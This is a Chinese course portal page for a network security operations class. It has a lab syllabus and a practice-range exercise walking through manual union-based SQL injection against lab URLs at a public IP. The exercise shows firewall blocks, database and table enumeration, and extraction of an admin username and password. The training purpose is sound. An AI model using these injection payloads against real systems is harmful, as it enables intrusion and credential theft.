课程门户-章节详情

网络安全运行与维护

李成海

1 §1 实训项目1 搭建网络安全实训环境
- 1.1 导入(第1次课)
- 1.2 §1.1 靶场：虚拟机CentOS7.8(192.168.112.100)
  - 1.2.1 (1)DVWA-master
  - 1.2.2 (2)sqli-labs(第3次课)
  - 1.2.3 (3)sqlmap
  - 1.2.4 (4)login, loginPHP
  - 1.2.5 (5)Firefox, Hackbar
  - 1.2.6 2022.09.07作业1 “未知攻，焉知防”
  - 1.2.7 2022.09.14作业3“拖库—爆库、爆表、爆字段、爆数据”
  - 1.2.8 Q&A-1(作业批改、辅导答疑)
- 1.3 §1.2 Burp(第2次课)
  - 1.3.1 2022.09.08作业2 “工欲善其事，必先利其器”
  - 1.3.2 Q&A-2(作业批改、辅导答疑)
- 1.4 §1.3 Python
  - 1.4.1 Python的Anaconda3集成开发环境
- 1.5 §1.4 Kali
  - 1.5.1 2022.09.15作业4“永恒之蓝漏洞”
- 1.6 §1.5 Wireshark
- 1.7 2022.09.15腾讯会议答疑
2 §2 实训项目2 SQL注入
- 2.1 ■(1)SQL注入联合查询(第3次课)
  - 2.1.1 附件：联合查询SQL注入模板
  - 2.1.2 ■模板
- 2.2 (2)SQL注入(PDF文档)
  - 2.2.1 ①更新Kali系统中的Firefox浏览器并安装浏览器插件
  - 2.2.2 (2)部署sqli-labs学习环境
  - 2.2.3 (3)sqli-labs使用教学
  - 2.2.4 (4)实战：SQL注入联合查询-获取数据库数据
- 2.3 ■(3)部署loginPHP网站
  - 2.3.1 ●SQL注入测试
  - 2.3.2 ●创建数据库、部署简单登录网站loginPHP、进行SQL注入测试(2019.12.17)
  - 2.3.3 ①login.php
  - 2.3.4 ②loginAuth.php
  - 2.3.5 ③loginAuth1.php
  - 2.3.6 ④success.php
  - 2.3.7 ⑤failure.php
  - 2.3.8 ■⑥(loginPHP网站SQL注入)结果截图
- 2.4 (4)DVWA的SQL Injection
- 2.5 (5)拓展视野：靶场SQL注入
3 §3 实训项目3 通过SQLmap进行SQL注入并获得后台管理员账号和密码
- 3.1 (1)安装DVWA
- 3.2 (2)安装SQLmap
- 3.3 (3)※实战 SQLmap探测DVWA的SQL注入漏洞
- 3.4 (4)结果截图(SQLmap拖库)
- 3.5 (5)使用BurpSuite进行POST方式的SQL注入
- 3.6 ■附安装DVWA-1.9(完整版)
4 §4 实训项目4 使用永恒之蓝漏洞对Win7进行渗透
- 4.1 (1)获取Win7系统shell、开启远程桌面
- 4.2 (2)截图
- 4.3 (3)Metasploit渗透测试
- 4.4 (4)使用msf渗透攻击XP并进行远程关机
5 §5 实训项目5 安装Kali渗透测试系统
- 5.1 BT到Kali的发展史
- 5.2 (1)安装Kali
- 5.3 (2)安装BT5
- 5.4 ■附安装Kali、BT5、DVWA、SQLmap、Win7
6 §6 实训项目6 配置Kali渗透测试系统
- 6.1 (1)安装Kali渗透测试系统
- 6.2 (2)SSH连接Kali
- 6.3 (3)※ettercap抓取FTP登录账号和密码
- 6.4 (4)结果截图(ettercap抓取FTP登录账号和密码)
7 §7 实训项目7 ARP协议安全攻防
- 7.1 (1)ARP协议安全攻防(试题)
- 7.2 (2)※ARP协议安全攻防
- 7.3 (4)实训防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
- 7.4 (3)练习：防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
- 7.5 演示视频 arpsproof+etthercap实施中间人攻击
8 §8 实训项目8 暴力破解
- 8.1 (1)※实战-通过暴力破解Web登录界面获得管理员权限
- 8.2 (2)字典工具pydictor.py
- 8.3 (3)hydra和xhydra
- 8.4 (4)Medusa
- 8.5 (5)离线破解md5值和shadow加密文件
- 8.6 (6)Brute Force(DVWA)
- 8.7 (7)Burp Suite(Windows)
- 8.8 (8)Burp Suite(Kali)
9 §9 实训项目9 防止黑客攻破Discuz论坛并拿下数据库
- 9.1 (1)防止黑客攻破Discuz论坛并拿下数据库
- 9.2 (2)CentOS6.5-desktop及MySQL
10 §10 实训项目10作业 Wireshark抓取Telnet明文包
- 10.1 (1)※Wireshark抓取Telnet明文包(CentOS6.5)
- 10.2 (2)结果截图(Wireshark抓取Telnet明文包)
- 10.3 (3)常用协议分析(ARP、ICMP、TCP、HTTP、DNS)
11 §11 实训项目11 基于文件上传漏洞获得网站shell权限
- 11.1 ●文件上传(PDF文档)
- 11.2 (1)基于文件上传漏洞获得网站shell权限
- 11.3 (2)本地文件包含漏洞截图
- 11.4 (3)课程资料
- 11.5 (4)课外编辑器KindEditor文件上传漏洞
12 §12 实训项目12 Nmap
- 12.1 (1)安全工具
- 12.2 (2)Nmap
- 12.3 (3)网络空间安全(系统渗透测试篇)
- 12.4 (4)信息收集
13 §13 实训项目13 File Inclusion文件包含漏洞及防御
- 13.1 (1)本地文件包含
- 13.2 (2)远程文件包含
14 §14 实训项目14 XSS跨站脚本攻击
- 14.1 (1)窃取用户Cookie信息保存到远程服务器
- 14.2 (2)反射型XSS攻击劫持用户浏览器
- 14.3 (3)存储型XSS窃取用户信息
15 §15 实训项目15 缓冲区溢出漏洞
16 §16 实训项目16 搭建蜜罐系统捕捉黑客操作步骤
17 考核
- 17.1 平时成绩(40%+30%)
- 17.2 期末考试(30%)
18 网络1901-04期末考试(2020-2021-2)
- 18.1 试题1：damicms
- 18.2 试题2：sqli-labs
- 18.3 试题3：dvwa
- 18.4 试题4：loginPHP
19 校外卷重修-B05123网络安全运行与维护复习
- 19.1 (1)loginPHP
- 19.2 (2)Python编程

(5)拓展视野：靶场SQL注入

训练：靶场SQL注入

【训练】9月30号前每人完成靶场SQL注入，录屏上传到群文件"训练题解答上传"目录。

①靶场：

http://59.63.200.79:8003/?id=1

http://59.63.200.79:8014/?id=1

②步骤：

sql手注的一般流程

一、判断注入点 ?id=1'

二、判断字段数 ?id=1 order by 2

三、判断回显点

MySQL: ?id=1 and 1=2 union select 1,2

?id=1 union select 1,2 limit 1,1

?id=-1 union select 1,2

?id=9.9999 union select 1,2

Access: ?id=1 union select 1,2,3,4,5,6,7,8,9,10 from admin/product

?id=1 union select 1,username,3,4,5,6,7,8,9,10 from admin

?id=1 union select 1,username,3,4,5,6,password,8,9,10 from admin

?id=1 and exists(select * from admin)

?id=1 and exists(select id from admin)

四、查询相关内容

Step1 http://59.63.200.79:8014/?id=1

正常

Step2 http://59.63.200.79:8014/?id=1'

报错：

Warning: mysqli_fetch_row() expects parameter 1 to be mysqli_result, boolean given in C:\phpStudy\WWW\index.php on line 61

说明单引号没有过滤，存在SQL注入漏洞

Step2 http://59.63.200.79:8014/?id=1 and 1=2

Step2 http://59.63.200.79:8014/?id=1 and 1=1

报错：

网站防火墙

您的请求带有不合法参数，已被网站管理员设置拦截！

可能原因：您提交的内容包含危险的攻击请求

如何解决：

1）检查提交内容；

2）如网站托管，请联系空间提供商；

3）普通网站访客，请联系网站管理员；

Step2 http://59.63.200.79:8014/?id=1 and -1=-1

正常

Step3 字段数：

Step3 http://59.63.200.79:8014/?id=1 order by 2

报错：

网站防火墙

您的请求带有不合法参数，已被网站管理员设置拦截！

可能原因：您提交的内容包含危险的攻击请求

如何解决：

1）检查提交内容；

2）如网站托管，请联系空间提供商；

3）普通网站访客，请联系网站管理员；

Step3 http://59.63.200.79:8003/?id=1 order by 2

正常

Step3http://59.63.200.79:8003/?id=1 order by 3

出错

说明2个字段

Step4 http://59.63.200.79:8014/?id=1 and 1=2 union select 1,2

报错：

网站防火墙

您的请求带有不合法参数，已被网站管理员设置拦截！

可能原因：您提交的内容包含危险的攻击请求

如何解决：

1）检查提交内容；

2）如网站托管，请联系空间提供商；

3）普通网站访客，请联系网站管理员；

Step4 http://59.63.200.79:8003/?id=1 and 1=2 union select 1,2

显示“2”

Step4 获取数据库名称：

http://59.63.200.79:8003/?id=1 and 1=2 union select 1,database()

显示数据库：maoshe

Step5 列出当前数据库所有表的名称：

http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

当前数据库[database()即maoshe]中共4张表：admin, dirs, news, xss

Step6 获取admin表中的字段名：

http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

表admin中共3个字段：Id, username, password

Step7 获取admin表中的用户名、密码字段中的值：

数据库：maoshe

表：admin

字段：Id, username, password

username和password之间加:(冒号)：0x3a

http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(username,0x3a,password) from admin

加水平线<hr >：0x3c,0x68,0x72,0x2f,0x3e

http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(username,0x3a,password,0x3c,0x68,0x72,0x2f,0x3e) from admin

即：

http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(username,':',password,'<hr />') from admin

用户名 : 密码为：

admin : hellohack

,ppt领取微信 : zkaqbanban

最后结果：

admin : hellohack

用户名：admin，密码：hellohack

Step1 http://59.63.200.79:8014/?id=1

Step2 http://59.63.200.79:8014/?id=1'

Step3 字段数：

Step4 获取数据库名称：

Step5 列出当前数据库所有表的名称：

Step6 获取admin表中的字段名：

Step7 获取admin表中的用户名、密码字段中的值：

图片预览